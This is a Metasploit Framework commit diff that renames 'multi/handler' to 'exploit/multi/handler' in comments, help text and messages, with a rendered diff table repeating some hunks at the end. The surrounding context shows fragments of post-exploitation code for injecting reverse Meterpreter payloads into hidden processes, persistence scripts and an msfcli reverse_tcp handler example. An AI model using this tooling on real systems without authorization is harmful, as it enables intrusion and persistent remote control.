Land rapid7#5527, multi/handler -> exploit/multi/handler

wvu · wvu · commit 8d640a0c8fa4 · 2015-06-15T10:23:26.000-05:00
diff --git a/lib/msf/core/db_manager/session.rb b/lib/msf/core/db_manager/session.rb
@@ -191,7 +191,7 @@ def create_mdm_session_from_session(opts)
         via_payload: session.via_payload,
       }
 
-      # In the case of multi handler we cannot yet determine the true
+      # In the case of exploit/multi/handler we cannot yet determine the true
       # exploit responsible. But we can at least show the parent versus
       # just the generic handler:
       if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb
@@ -497,7 +497,7 @@ def get_uri(cli=self.cli)
   # bind payload but there's nothing we can do about it.
   #
   # NOTE: The address will be *incorrect* in the following two situations:
-  # 1. LHOST is pointed at a multi/handler on some other box.
+  # 1. LHOST is pointed at a exploit/multi/handler on some other box.
   # 2. SRVHOST has a value of '0.0.0.0', the user is behind NAT, and we're
   #    using a bind payload.  In that case, we don't have an LHOST and
   #    the source address will be internal.
diff --git a/modules/exploits/windows/browser/persits_xupload_traversal.rb b/modules/exploits/windows/browser/persits_xupload_traversal.rb
@@ -21,7 +21,7 @@ def initialize(info = {})
         an attacker is able to write arbitrary files to arbitrary locations on disk.
 
         Code execution occurs by writing to the All Users Startup Programs directory.
-        You may want to combine this module with the use of multi/handler since a
+        You may want to combine this module with the use of exploit/multi/handler since a
         user would have to log for the payload to execute.
       },
       'License'        => MSF_LICENSE,
diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb
@@ -24,7 +24,7 @@ def initialize(info = {})
 
           If you are attempting to obtain multiple reverse shells using this module we
         recommend setting the "DisablePayloadHandler" advanced option to "true", and setting
-        up a multi/handler to run in the background as a job to support multiple incoming
+        up a exploit/multi/handler to run in the background as a job to support multiple incoming
         shells.
 
           If you are interested in deploying payloads to spefic servers this module also
@@ -89,17 +89,17 @@ def exploit
 
     # Define master array to keep track of enumerated database information
     masterList = Array.new
-    masterList[0] = Hash.new			# Define new hash
-    masterList[0]["name"] = ""			# Name of the current database server
-    masterList[0]["db_link"] = ""		# Name of the linked database server
-    masterList[0]["db_user"] = ""	 	# User configured on the database server link
-    masterList[0]["db_sysadmin"] = ""	# Specifies if  the database user configured for the link has sysadmin privileges
-    masterList[0]["db_version"] = ""	# Database version of the linked database server
-    masterList[0]["db_os"] = ""			# OS of the linked database server
-    masterList[0]["path"] = [[]]		# Link path used during crawl - all possible link paths stored
-    masterList[0]["done"] = 0			# Used to determine if linked need to be crawled
-
-    shelled = Array.new					# keeping track of shelled systems - multiple incoming sa links could result in multiple shells on one system
+    masterList[0] = Hash.new            # Define new hash
+    masterList[0]["name"] = ""          # Name of the current database server
+    masterList[0]["db_link"] = ""       # Name of the linked database server
+    masterList[0]["db_user"] = ""       # User configured on the database server link
+    masterList[0]["db_sysadmin"] = ""   # Specifies if  the database user configured for the link has sysadmin privileges
+    masterList[0]["db_version"] = ""    # Database version of the linked database server
+    masterList[0]["db_os"] = ""         # OS of the linked database server
+    masterList[0]["path"] = [[]]        # Link path used during crawl - all possible link paths stored
+    masterList[0]["done"] = 0           # Used to determine if linked need to be crawled
+
+    shelled = Array.new                 # keeping track of shelled systems - multiple incoming sa links could result in multiple shells on one system
 
     # Setup query for gathering information from database servers
     versionQuery = "select @@servername,system_user,is_srvrolemember('sysadmin'),(REPLACE(REPLACE(REPLACE\
diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -33,7 +33,7 @@ def initialize(info = {})
         OptInt.new('LPORT',
           [false, 'Port for Payload to connect to.', 4433]),
         OptBool.new('HANDLER',
-          [ true, 'Start an Exploit Multi Handler to receive the connection', true])
+          [ true, 'Start an exploit/multi/handler to receive the connection', true])
       ], self.class)
     deregister_options('PERSIST', 'PSH_OLD_METHOD', 'RUN_WOW64')
   end
@@ -101,7 +101,7 @@ def run
     if datastore['HANDLER']
       listener_job_id = create_multihandler(lhost, lport, payload_name)
       if listener_job_id.blank?
-        print_error("Failed to start multi/handler on #{datastore['LPORT']}, it may be in use by another process.")
+        print_error("Failed to start exploit/multi/handler on #{datastore['LPORT']}, it may be in use by another process.")
         return nil
       end
     end
@@ -208,7 +208,7 @@ def cleanup_handler(listener_job_id, aborted)
           timer += 1
         end
       end
-      print_status('Stopping multi/handler')
+      print_status('Stopping exploit/multi/handler')
       framework.jobs.stop_job(listener_job_id)
     }
   end
@@ -238,12 +238,12 @@ def check_for_listener(lhost, lport)
     return false
   end
 
-  # Starts a multi/handler session
+  # Starts a exploit/multi/handler session
   def create_multihandler(lhost, lport, payload_name)
     pay = client.framework.payloads.create(payload_name)
     pay.datastore['LHOST'] = lhost
     pay.datastore['LPORT'] = lport
-    print_status('Starting exploit multi handler')
+    print_status('Starting exploit/multi/handler')
     if !check_for_listener(lhost, lport)
       # Set options for module
       mh = client.framework.exploits.create('multi/handler')
diff --git a/modules/post/multi/manage/system_session.rb b/modules/post/multi/manage/system_session.rb
@@ -28,7 +28,7 @@ def initialize(info={})
         OptInt.new('LPORT',
           [false, 'Port for Payload to connect to.', 4433]),
         OptBool.new('HANDLER',
-          [ true, 'Start an Exploit Multi Handler to receive the connection', false]),
+          [ true, 'Start an exploit/multi/handler to receive the connection', false]),
         OptEnum.new('TYPE', [true, 'Scripting environment on target to use for reverse shell',
           'auto', ['auto','ruby','python','perl','bash']])
       ], self.class)
@@ -111,12 +111,12 @@ def check_for_listner(lhost,lport)
     return conflict
   end
 
-  # Starts a multi/handler session
+  # Starts a exploit/multi/handler session
   def create_multihand(lhost,lport)
     pay = client.framework.payloads.create("generic/shell_reverse_tcp")
     pay.datastore['LHOST'] = lhost
     pay.datastore['LPORT'] = lport
-    print_status("Starting exploit multi handler")
+    print_status("Starting exploit/multi/handler")
     if not check_for_listner(lhost,lport)
       # Set options for module
       mul = client.framework.exploits.create("multi/handler")
diff --git a/modules/post/windows/manage/multi_meterpreter_inject.rb b/modules/post/windows/manage/multi_meterpreter_inject.rb
@@ -32,7 +32,7 @@ def initialize(info={})
         OptInt.new('LPORT',      [false, 'Port number for the payload LPORT variable.', 4444]),
         OptString.new('IPLIST',  [true, 'List of semicolom separated IP list.', Rex::Socket.source_address("1.2.3.4")]),
         OptString.new('PIDLIST', [false, 'List of semicolom separated PID list.', '']),
-        OptBool.new('HANDLER',   [false, 'Start new multi/handler job on local box.', false]),
+        OptBool.new('HANDLER',   [false, 'Start new exploit/multi/handler job on local box.', false]),
         OptInt.new('AMOUNT',     [false, 'Select the amount of shells you want to spawn.', 1])
       ], self.class)
 
@@ -117,7 +117,7 @@ def create_multi_handler(payload_to_inject,rport,rhost = '0.0.0.0')
       'Payload'        => mul.datastore['PAYLOAD'],
       'RunAsJob'       => true
     )
-    print_good("Multi/Handler started!")
+    print_good("exploit/multi/handler started!")
   end
 
   # Function for Creating the Payload
diff --git a/modules/post/windows/manage/payload_inject.rb b/modules/post/windows/manage/payload_inject.rb
@@ -33,7 +33,7 @@ def initialize(info={})
         OptAddress.new('LHOST', [true, 'IP of host that will receive the connection from the payload.']),
         OptInt.new('LPORT', [false, 'Port for Payload to connect to.', 4433]),
         OptInt.new('PID', [false, 'Process Identifier to inject of process to inject payload.']),
-        OptBool.new('HANDLER', [ false, 'Start an Exploit Multi Handler to receive the connection', false]),
+        OptBool.new('HANDLER', [ false, 'Start an exploit/multi/handler to receive the connection', false]),
         OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format."]),
         OptInt.new('AMOUNT',  [false, 'Select the amount of shells you want to spawn.', 1])
         ], self.class)
@@ -112,9 +112,9 @@ def create_payload(name, lhost, lport, opts = "")
     return pay
   end
 
-  # Starts a multi/handler session
+  # Starts a exploit/multi/handler session
   def create_multihand(pay,pay_name,lhost,lport)
-    print_status("Starting exploit multi handler")
+    print_status("Starting exploit/multi/handler")
     if not check_for_listner(lhost,lport)
       # Set options for module
       mul = client.framework.exploits.create("multi/handler")
diff --git a/msfcli b/msfcli
@@ -95,7 +95,7 @@ class Msfcli
     $stdout.puts "Error: #{str}\n\n" if str
     $stdout.puts tbl.to_s + "\n"
     $stdout.puts "Examples:" + "\n"
-    $stdout.puts "msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E" + "\n"
+    $stdout.puts "msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E" + "\n"
     $stdout.puts "msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post= nop= E" + "\n"
     $stdout.puts extra + "\n" if extra
     $stdout.puts
@@ -542,7 +542,7 @@ class Msfcli
         show_payloads(modules)
       end
     when "t"
-      puts 
+      puts
       if modules[:module].file_path =~ /auxiliary\//i
         $stdout.puts("\nError: This type of module does not support targets")
       else
diff --git a/scripts/meterpreter/duplicate.rb b/scripts/meterpreter/duplicate.rb
@@ -23,7 +23,7 @@
   "-e"  => [ true,   "Executable to inject into. Default notepad.exe, will fall back to spawn if not found."],
   "-P"  => [ true,   "Process id to inject into; use instead of -e if multiple copies of one executable are running."],
   "-s"  => [ false,  "Spawn new executable to inject to.  Only useful with -P."],
-  "-D"  => [ false,  "Disable the automatic multi/handler (use with -r to accept on another system)"]
+  "-D"  => [ false,  "Disable the automatic exploit/multi/handler (use with -r to accept on another system)"]
 )
 
 #
diff --git a/scripts/meterpreter/metsvc.rb b/scripts/meterpreter/metsvc.rb
@@ -18,7 +18,7 @@
 opts = Rex::Parser::Arguments.new(
   "-h"  => [ false,  "This help menu"],
   "-r"  => [ false,  "Uninstall an existing Meterpreter service (files must be deleted manually)"],
-  "-A"  => [ false,  "Automatically start a matching multi/handler to connect to the service"]
+  "-A"  => [ false,  "Automatically start a matching exploit/multi/handler to connect to the service"]
 )
 
 # Exec a command and return the results
@@ -117,7 +117,7 @@ def m_exec(session, cmd)
   end
 
   #
-  # Setup the multi/handler if requested
+  # Setup the exploit/multi/handler if requested
   #
   if(autoconn)
     print_status("Trying to connect to the Meterpreter service at #{client.session_host}:#{rport}...")
diff --git a/scripts/meterpreter/multi_meter_inject.rb b/scripts/meterpreter/multi_meter_inject.rb
@@ -20,11 +20,11 @@
 start_handler = nil
 @exec_opts = Rex::Parser::Arguments.new(
   "-h"  => [ false,  "Help menu." ],
-  "-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4444)"],
-  "-m"  => [ false,  "Start Exploit multi/handler for return connection"],
-  "-pt" => [ true,   "Specify Reverse Connection Meterpreter Payload. Default windows/meterpreter/reverse_tcp"],
-  "-mr" => [ true,   "Provide Multiple IP Addresses for Connections separated by comma."],
-  "-mp" => [ true,   "Provide Multiple PID for connections separated by comma one per IP."]
+  "-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4444)."],
+  "-m"  => [ false,  "Start exploit/multi/handler for return connection."],
+  "-pt" => [ true,   "Specify reverse connection Meterpreter payload. Default: windows/meterpreter/reverse_tcp"],
+  "-mr" => [ true,   "Provide multiple IP addresses for connections separated by comma."],
+  "-mp" => [ true,   "Provide multiple PID for connections separated by comma one per IP."]
 )
 meter_type = client.platform
 
@@ -33,17 +33,17 @@
 # Usage Message Function
 #-------------------------------------------------------------------------------
 def usage
-  print_line "Meterpreter Script for injecting a reverce tcp Meterpreter Payload"
-  print_line "in to memory of multiple PIDs, if none is provided a notepad process."
-  print_line "will be created and a Meterpreter Payload will be injected in to each."
+  print_line "Meterpreter script for injecting a reverce tcp Meterpreter payload"
+  print_line "in to memory of multiple PIDs. If none is provided, a notepad process"
+  print_line "will be created and a Meterpreter payload will be injected in to each."
   print_line(@exec_opts.usage)
   raise Rex::Script::Completed
 end
 
 # Wrong Meterpreter Version Message Function
 #-------------------------------------------------------------------------------
 def wrong_meter_version(meter = meter_type)
-  print_error("#{meter} version of Meterpreter is not supported with this Script!")
+  print_error("#{meter} version of Meterpreter is not supported with this script!")
   raise Rex::Script::Completed
 end
 
@@ -62,12 +62,12 @@ def inject(target_pid, payload_to_inject)
     host_process.thread.create(mem, 0)
     print_good("Successfully injected Meterpreter in to process: #{target_pid}")
   rescue::Exception => e
-    print_error("Failed to Inject Payload to #{target_pid}!")
+    print_error("Failed to Inject payload to #{target_pid}!")
     print_error(e)
   end
 end
 
-# Function for Creation of Connection Handler
+# Function for creation of connection handler
 #-------------------------------------------------------------------------------
 def create_multi_handler(payload_to_inject)
   mul = @client.framework.exploits.create("multi/handler")
@@ -84,7 +84,7 @@ def create_multi_handler(payload_to_inject)
 
 end
 
-# Function for Creating the Payload
+# Function for creating the payload
 #-------------------------------------------------------------------------------
 def create_payload(payload_type,lhost,lport)
   print_status("Creating a reverse meterpreter stager: LHOST=#{lhost} LPORT=#{lport}")
@@ -98,7 +98,7 @@ def create_payload(payload_type,lhost,lport)
 # Function starting notepad.exe process
 #-------------------------------------------------------------------------------
 def start_proc()
-  print_good("Starting Notepad.exe to house Meterpreter Session.")
+  print_good("Starting Notepad.exe to house Meterpreter session.")
   proc = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true })
   print_good("Process created with pid #{proc.pid}")
   return proc.pid
@@ -121,12 +121,12 @@ def start_proc()
   end
 }
 
-# Check for Version of Meterpreter
+# Check for version of Meterpreter
 wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i
-# Create a Multi Handler is Desired
+# Create a exploit/multi/handler if desired
 create_multi_handler(payload_type) if start_handler
 
-# Check to make sure a PID or Program name where provided
+# Check to make sure a PID or program name where provided
 
 if multi_ip
   if multi_pid
@@ -149,4 +149,3 @@ def start_proc()
 else
   print_error("You must provide at least one IP!")
 end
-
diff --git a/scripts/meterpreter/persistence.rb b/scripts/meterpreter/persistence.rb
@@ -35,7 +35,7 @@
   "-X"  => [ false,  "Automatically start the agent when the system boots"],
   "-U"  => [ false,  "Automatically start the agent when the User logs on"],
   "-S"  => [ false,  "Automatically start the agent on boot as a service (with SYSTEM privileges)"],
-  "-A"  => [ false,  "Automatically start a matching multi/handler to connect to the agent"],
+  "-A"  => [ false,  "Automatically start a matching exploit/multi/handler to connect to the agent"],
   "-L"  => [ true,   "Location in target host to write payload to, if none \%TEMP\% will be used."],
   "-T"  => [ true,   "Alternate executable template to use"],
   "-P"  => [ true,   "Payload to use, default is windows/meterpreter/reverse_tcp."]
@@ -138,7 +138,7 @@ def write_script_to_target(target_dir,vbs)
   return tempvbs
 end
 
-# Function for setting multi handler for autocon
+# Function for setting exploit/multi/handler for autocon
 #-------------------------------------------------------------------------------
 def set_handler(selected_payload,rhost,rport)
   print_status("Starting connection handler at port #{rport} for #{selected_payload}")
@@ -154,7 +154,7 @@ def set_handler(selected_payload,rhost,rport)
     'Payload'        => mul.datastore['PAYLOAD'],
     'RunAsJob'       => true
   )
-  print_good("Multi/Handler started!")
+  print_good("exploit/multi/handler started!")
 end
 
 # Function to execute script on target and return the PID of the process
@@ -237,7 +237,7 @@ def install_as_service(script_on_target)
 script = create_script(delay, altexe, raw, payload_type.include?('/x64/'))
 script_on_target = write_script_to_target(target_dir, script)
 
-# Start Multi/Handler
+# Start exploit/multi/handler
 if autoconn
   set_handler(payload_type, rhost, rport)
 end
diff --git a/scripts/meterpreter/vnc.rb b/scripts/meterpreter/vnc.rb
@@ -21,7 +21,7 @@
   "-v"  => [ true,   "The local port for the VNC proxy service (default: 5900)"],
   "-i"  => [ false,  "Inject the vnc server into a new process's memory instead of building an exe"],
   "-P"  => [ true,   "Executable to inject into (starts a new process).  Only useful with -i (default: notepad.exe)"],
-  "-D"  => [ false,  "Disable the automatic multi/handler (use with -r to accept on another system)"],
+  "-D"  => [ false,  "Disable the automatic exploit/multi/handler (use with -r to accept on another system)"],
   "-O"  => [ false,  "Disable binding the VNC proxy to localhost (open it to the network)"],
   "-V"  => [ false,  "Disable the automatic launch of the VNC client"],
   "-t"  => [ false,  "Tunnel through the current session connection. (Will be slower)"],
@@ -176,7 +176,7 @@ def unsupported
 end
 
 if tunnel
-  # Set up a port forward for the multi/handler to use for uploading the stage
+  # Set up a port forward for the exploit/multi/handler to use for uploading the stage
   print_status("Starting the port forwarding from #{rport} => TARGET:#{rport}")
   client.run_cmd("portfwd add -L 127.0.0.1 -l #{rport} -p #{rport} -r #{lhost}")
 end
diff --git a/scripts/resource/fileformat_generator.rc b/scripts/resource/fileformat_generator.rc
diff --git a/spec/msfcli_spec.rb b/spec/msfcli_spec.rb

Original file line number	Diff line number	Diff line change
`@@ -191,7 +191,7 @@ def create_mdm_session_from_session(opts)`
`191`	`191`	`via_payload: session.via_payload,`
`192`	`192`	`}`
`193`	`193`
`194`		`- # In the case of multi handler we cannot yet determine the true`
	`194`	`+ # In the case of exploit/multi/handler we cannot yet determine the true`
`195`	`195`	`# exploit responsible. But we can at least show the parent versus`
`196`	`196`	`# just the generic handler:`
`197`	`197`	`if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']`
Original file line number	Diff line number	Diff line change
`@@ -497,7 +497,7 @@ def get_uri(cli=self.cli)`
`497`	`497`	`# bind payload but there's nothing we can do about it.`
`498`	`498`	`#`
`499`	`499`	`# NOTE: The address will be incorrect in the following two situations:`
`500`		`- # 1. LHOST is pointed at a multi/handler on some other box.`
	`500`	`+ # 1. LHOST is pointed at a exploit/multi/handler on some other box.`
`501`	`501`	`# 2. SRVHOST has a value of '0.0.0.0', the user is behind NAT, and we're`
`502`	`502`	`# using a bind payload. In that case, we don't have an LHOST and`
`503`	`503`	`# the source address will be internal.`
Original file line number	Diff line number	Diff line change
`@@ -23,7 +23,7 @@`
`23`	`23`	`"-e" => [ true, "Executable to inject into. Default notepad.exe, will fall back to spawn if not found."],`
`24`	`24`	`"-P" => [ true, "Process id to inject into; use instead of -e if multiple copies of one executable are running."],`
`25`	`25`	`"-s" => [ false, "Spawn new executable to inject to. Only useful with -P."],`
`26`		`- "-D" => [ false, "Disable the automatic multi/handler (use with -r to accept on another system)"]`
	`26`	`+ "-D" => [ false, "Disable the automatic exploit/multi/handler (use with -r to accept on another system)"]`
`27`	`27`	`)`
`28`	`28`
`29`	`29`	`#`